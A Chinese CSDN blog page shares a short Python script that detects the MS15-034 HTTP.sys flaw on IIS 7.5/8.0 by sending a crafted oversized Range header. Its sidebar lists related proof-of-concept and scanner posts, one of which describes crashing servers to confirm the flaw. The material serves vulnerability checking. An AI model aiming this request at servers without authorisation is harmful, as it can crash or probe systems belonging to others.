python漏洞利用脚本_MS15-034 Python脚本漏洞检测

最新推荐文章于 2023-05-05 23:20:35 发布
最新推荐文章于 2023-05-05 23:20:35 发布
阅读量352 收藏
点赞数
文章标签: python漏洞利用脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39939661/article/details/111454646
版权

import requests

代码区域print(" =================================================")

print(" ")

print(" MS15-034 漏洞 CheckList(WEB安全) ")

print(" ")

print(" Author : 小毛 ")

print(" ")

print(" Join US : www.ianquan.org.cn ")

print(" ")

print(" =================================================")

url = input("请输入你要检测的url:")

pyload = {'Host':'stuff','Range':'bytes=0-18446744073709551615'}

headers = requests.options(url)

r = headers.headers['Server']

if r == "Microsoft-IIS/7.5" or r =="Microsoft-IIS/8.0":

response = requests.get(url,headers = pyload)

if "Requested Range Not Satisfiable" in str(response.content):

print("[+]",url," ","服务器存在MS15-034漏洞")

else:

print("[+]",url," ","server not exists MS15-034")

else:

print("Server not IIS 7.5 or IIS 8.0")

exit = input("请输入任意键退出:")

weixin_39939661
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
扫描器篇(一)之python request模块编写漏洞扫描器,顺便利用一下探测出来的ms15-034
weixin_44344395的博客
03-02 1199
ms15-034一个高危漏洞 根据微软官方公告来看,受影响的系统还是挺多的,那么本次就记录这个漏洞的学习过程吧 从官方的公告可以得知产生原因 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中, 当 HTTP.sys未正确分析经特殊设计的 HTTP 请求时会导致 此漏洞。 成功利用漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 也就说明通过特殊构造的...
ms15_034漏洞poc脚本
洋洋的小黑屋
05-23 526
ms15_034漏洞poc脚本 环境python3编写的: # coding=utf-8 import requests url = "http://192.168.64.129:8001/" r = requests.get(url) print(r.headers) remote_server = r.headers["Server"] if remote_server.find('IIS/7.5') or remote_server.find('IIS/8.0'): payload = {'H
ms15-034漏洞监测脚本
05-09
可以通过使服务器蓝屏崩溃监测服务器是否存在漏洞,以便修改加固。
MS15-034漏洞检测工具-PY脚本
04-18
IIS高风险漏洞MS15-034的POC,可利用脚本检测漏洞是否存在。
python编写工具07_编写一个漏洞检测工具(ms15-034
划水的小白白
03-09 473
漏洞原理 1. 一些问题 问: 为什么有成熟的工具了,我们还需要自己编写? 答: 一些漏洞刚刚被披露出来的时候,网上是没有对应的工具的。 这个时候就要求我们根据漏洞原理写出对应的POC代码,用来验证漏洞是否存在。 2. 本文以ms15-034为例子。 原理的话,本文就不占用篇幅取介绍了,可以自行百度。 复现的话,本机装一个win7 sp1,开启iis服务即可。 Win 7安装iis 7组件:https://jingyan.baidu.com/article/2fb0ba409
ms15-034-checker:用于检查 ms15-034 的 Ruby 脚本
06-11
#MS15-034-检查器 一个简单的 Ruby 脚本,用于检查您的 IIS 服务器是否易受 MS15-034 攻击。 这是为任何其他 Ruby 脚本编写者编写的,用于查看、学习和扩展,因为似乎唯一的东西是在 Python 或 Metasploit 模块中。 ##Usage ./ms15_034_check.rb 它可以做 http 和 https 的 URL,将两者都关闭它会尝试使用 http。 ##Other Info 除了学习之外,我不建议使用它。 我建议使用 nmap 脚本或 Metasploit 模块 ,两者都可以测试 IP 的范围,而不是像这个脚本那样一次测试一个。 ##Requirements mechanize gem, gem install mechanize 应该是你所需要的。
MS15-034-Scanner:支持通过http和https扫描MS15-034漏洞的应用程序
05-16
MS15-034-扫描仪 MS15-034-Scanner是Windows命令行实用程序,它扫描[MS15-034]( )漏洞的一个或多个URL。以非破坏性的方式该实用程序使用原始套接字来执行扫描,从而绕过大多数本机.NET Web浏览器或客户端(阻止...
MS15-034 HTTP.sys远程执行代码漏洞(原理扫描)
11-16
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2015/ms15-034 如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这...
Python脚本实现Web漏洞扫描工具
09-21
是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞。下文给大家介绍了使用说明和源代码,一起看看吧
python脚本溢出Windows 2000 Professional的漏洞ms08_067
天元喜羊羊的博客
07-07 2997
脚本如下: #!/usr/bin/env python ############################################################################# # MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled) # www.hackingspirits.com # www
漏洞扫描器源代码
11-15
Python开发的漏洞扫描器源代码,非常好用。。。。。。。
python漏洞
黑面狐
04-12 2378
一个简单的爬漏洞库,并整理到Excel中# -*- coding: utf-8 -*- from bs4 import BeautifulSoup import requests import xlwt import warnings import sys import time reload(sys) sys.setdefaultencoding('utf-8') warnings.filte...
web服务器软件漏洞MS15-034&CVE-2017-12615)
kid的博客
07-24 1306
web服务器软件漏洞MS15-034&CVE-2017-12615) 想找找有没有能利用web服务器软件漏洞拿shell的,主要尝试了两个,但实际情况感人…(主要最近去了看雪安全开发者峰会,有大佬讲了最近很火的rdp那个洞,也提到了经典的永恒之蓝,确实这样的的洞很厉害啊,利用溢出直接攻陷主机,但二进制方面确实没有什么学习啊,所以突发奇想,想看看有没有什么利用iis,Apache之类的软件...
Bandit:一款Python代码安全漏洞检测工具
06-15 3138
工具介绍 Bandit这款工具可以用来搜索Python代码中常见的安全问题,在检测过程中,Bandit会对每一份Python代码文件进行处理,并构建AST,然后针对每一个AST节点运行相应的检测插件。完成安全扫描之后,Bandit会直接给用户生成检测报告。 工具安装 Bandit使用PyPI来进行分发,建议广大用户直接使用pip来安装Bandit。 创建虚拟环境(可选): virt...
使用Burp Suite和Python进行自动化漏洞挖掘
鹅子鱼的博客:很菜但是很好学的小菜鸟
05-05 2006
最近一直在研究如何解放双手(好歹咱也做过两年程序员) 进行自动化挖掘(虽然目前能力还欠缺)简单的解放一下双手还是可以的 下面将利用Burp和python来实现自动化
python 漏洞扫描工具_python打造文件包含漏洞检测工具
weixin_39604189的博客
12-13 394
importrequestsimportthreadingimportosimporttimeimportsyscookies={}urls=input('Please enter the target:')user=input('Enter the file you want to read:')user2=input('Enter your cookie:')for lie in user2....
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞
热门推荐
记录并分享学习安全的知识点..
01-25 1万+
一、漏洞介绍 vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。 二、环境搭建 攻击机(本机):192.168.1.3 靶机(metaspolit2):192.168.1.5 三、nmap进行漏洞检测 (四)python脚本进行漏洞检测
Python打造漏洞扫描器 6
oxuzhenyi的博客
05-26 3933
扫描器之目标端口扫描与系统指纹分析 一、实验介绍 1.1 实验内容 利用python的socket模块连接端口-俗称端口扫描,通过对应的端口返回出对应的端口服务。 1.2 实验知识点 Socket对应端口对应服务多线程的操作扫描器中的使用 1.3 实验环境 Python2.7Xfce终端Sublime 1.4 适合人群 本课程难度为一般,属于初
python代码扫描工具_Python脚本实现Web漏洞扫描工具
weixin_39593354的博客
12-04 1483
这是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞,代码是看过github外国大神(听说是SMAP的编写者之一)的两个小工具源码,根据里面的思路自己写的。以下是使用说明和源代码。一、使用说明:1.运行环境:Linux命令行界面+Python2.72.程序源码:Vim scanner//建立一个名为scanner的文件Chmod a+xscanner//修...
ms15-034修复打补丁
最新发布
08-31
针对 ms15-034 的修复,您可以通过以下步骤来打补丁: 1. 首先,确保您的系统已经安装了最新的安全补丁。您可以在微软官方网站上查找并下载相应的补丁程序。 2. 下载适用于您的操作系统和架构的修复补丁。微软通常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值